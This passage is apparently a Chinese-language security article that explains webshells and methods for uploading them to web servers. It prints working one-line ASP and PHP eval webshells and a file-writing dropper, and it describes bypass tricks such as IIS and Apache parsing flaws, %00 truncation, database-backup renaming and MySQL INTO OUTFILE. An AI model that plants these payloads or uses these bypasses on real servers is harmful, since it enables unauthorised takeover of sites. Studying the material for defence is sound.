webshell

Webshell实现与隐藏探究

一、什么是webshell

webshell简介

webshell，顾名思义：web指的是在web服务器上，而shell是用脚本语言编写的脚本程序，webshell就是就是web的一个管理工具，可以对web服务器进行操作的权限，也叫webadmin。webshell一般是被网站管理员用于网站管理、服务器管理等等一些用途，但是由于webshell的功能比较强大，可以上传下载文件，查看数据库，甚至可以调用一些服务器上系统的相关命令（比如创建用户，修改删除文件之类的），通常被黑客利用，黑客通过一些上传方式，将自己编写的webshell上传到web服务器的页面的目录下，然后通过页面访问的形式进行入侵，或者通过插入一句话连接本地的一些相关工具直接对服务器进行入侵操作。

webshell的分类

webshell根据脚本可以分为PHP脚本木马，ASP脚本木马，也有基于.NET的脚本木马和JSP脚本木马。在国外，还有用python脚本语言写的动态网页，当然也有与之相关的webshell。
根据功能也分为大马与小马，小马通常指的一句话木马，例如：<%eval request(“pass”)%>通常把这句话写入一个文档里面，然后文件名改成xx.asp。然后传到服务器上面。这里eval方法将request(“pass”)转换成代码执行，request函数的作用是应用外部文件。这相当于一句话木马的客户端配置。服务器配置（即本机配置）：

set lP=server.createObject("Adodb.Stream")//建立流对象 lP.Open //打开 lP.Type=2 //以文本方式 lP.CharSet="gb2312" //字体标准 lP.writetext request("newvalue") lP.SaveToFile server.mappath("newmm.asp"),2 //将木马内容以覆盖文件的方式写入newmm.asp，2就是已覆 盖的方式 lP.Close //关闭对象 set lP=nothing //释放对象 response.redirect "newmm.asp" //转向newmm.asp （添入生成木马的内容）

这里通过提交表单的方式，将木马提交上去，具体的做法是将定义一个对象IP，然后以文本方式写入newvalue里面的内容（newvalue的内容在textarea定义），写入以覆盖的方式产生ASP文件，然后执行这个脚本。其中客户端中的value代表的是表单的名字，必须跟服务端（本机）的post提交中的表单名一样，所以这里的value可以为任意字符，相当于一个密码之类的东西，但是这个‘密码’是明文的，可以截取下来。PHP的一句话原理跟以上的原理差不多，就是语言的差别导致语法不同。这就是小马的基本工作原理。
大马的工作模式简单的多，他没有客户端与服务端的区别，就是一些脚本大牛直接把一句话木马的服务端整合到了一起，通过上传漏洞将大马上传，然后复制该大马的url地址直接访问，在页面上执行对web服务器的渗透工作。但是有些网站对上传文件做了严格的限制，因为大马的功能较多，所以体积相对较大，很有可能超出了网站上传限制，但是小马的体积可以控制（比如把代码复制很多遍，或者在一个乱码文件中夹入代码），但是小马操作起来比较繁琐，可以先上传小马拿到webshell，然后通过小马的连接上传大马拿到服务器。

二、如何上传webshell

1.解析漏洞上传

现在对于不同的web服务器系统对应的有不同的web服务端程序，windows端主流的有iis，linux端主流的有nginx。这些服务对搭建web服务器提供了很大的帮助，同样也对服务器带来隐患，这些服务器上都存在一些漏洞，很容易被黑客利用。
(1)iis目录解析漏洞
比如：/xx.asp/xx.jpg
虽然上传的是JPG文件，但是如果该文件在xx.asp文件夹下，那个iis会把这个图片文件当成xx.asp解析，这个漏洞存在于iis5.x/6.0版本。
(2)文件解析漏洞
比如：xx.asp;.jpg。在网页上传的时候识别的是jpg文件，但是上传之后iis不会解析;之后的字符，同样会把该文件解析成asp文件，这个漏洞存在于iis5.x/6.0版本。
(3)文件名解析
比如：xx.cer/xx.cdx/xx.asa。在iis6.0下，cer文件，cdx文件，asa文件都会被当成可执行文件，里面的asp代码也同样会执行。（其中asa文件是asp特有的配置文件，cer为证书文件）。
(4)fast-CGI解析漏洞
在web服务器开启fast-CGI的时候，上传图片xx.jpg。内容为：

<?php fputs(fopen('shell.php','w'),'<?php eval($_POST[shell])?>');?>

这里使用的fput创建一个shell.php文件，并写入一句话。访问路径xx.jpg/.php，就会在该路径下生成一个一句话木马shell.php。这个漏洞在IIS 7.0/7.5，Nginx 8.03以下版本存在。语言环境：PHP，prel，Bourne Shell，C等语言。

*注：fast-CGI是CGI的升级版，CGI指的是在服务器上提供人机交互的接口，fast-CGI是一种常驻型的CGI。因为CGI每次执行时候，都需要用fork启用一个进程，但是fast-CGI属于激活后就一直执行，不需要每次请求都fork一个进程。比普通的CGI占的内存少。
(5)apache解析漏洞
apache解析的方式是从右向左解析，如果不能解析成功，就会想左移动一个，但是后台上传通常是看上传文件的最右的一个后缀，所以根据这个，可以将马命名为xx.php.rar，因为apache解析不了rar，所以将其解析为php，但是后台上传点就将其解析为rar，这样就绕过了上传文件后缀限制
2.截断上传
在上传图片的时候，比如命名1.asp .jpg(asp后面有个空格)，在上传的时候，用NC或者burpsuite抓到表单，将上传名asp后面加上%00（在burpsuite里面可以直接编辑HEX值，空格的HEX值为20，将20改为00），如果HEX为00的时候表示截断，20表示空格，如果表示截断的时候就为无视脚本中的JPG验证语句，直接上传ASP。
3.后台数据库备份
在一些企业的后台管理系统中，里面有一项功能是备份数据库（比如南方cms里面就有备份数据库的功能）。可以上传一张图片，图片里面含有一句话木马，或者将大马改成jpg格式，然后用数据库备份功能，将这张图片备份为asp等其他内容可以被解析为脚本语句的格式，然后再通过web访问就可以执行木马了，但是这种方法很老了，现在大多数的cms已经把这种备份的功能取消了，或者禁用了。
4.利用数据库语句上传
(1) mysql数据库into outfile
这种方式的前提必须是该网站有相应的注入点，而且当前用户必须要有上传的权限，而且必须有当前网页在服务器下的绝对路径。方法是用联合查询，将一句话木马导入到网站下边的一个php文件中去，然后使用服务端连接该网站。但是上述方法条件过于苛刻，一般遇到的情况很少。
(2)建立新表写入木马
一些开源cms或者自制的webshell会有数据库管理功能，在数据库管理功能里面有sql查询功能，先使用create table shell(codetext);创建一个名字叫做shell的表，表里面有列明叫做code，类型为text。然后使用insert into shell(code) values(‘一句话马’)，这里讲shell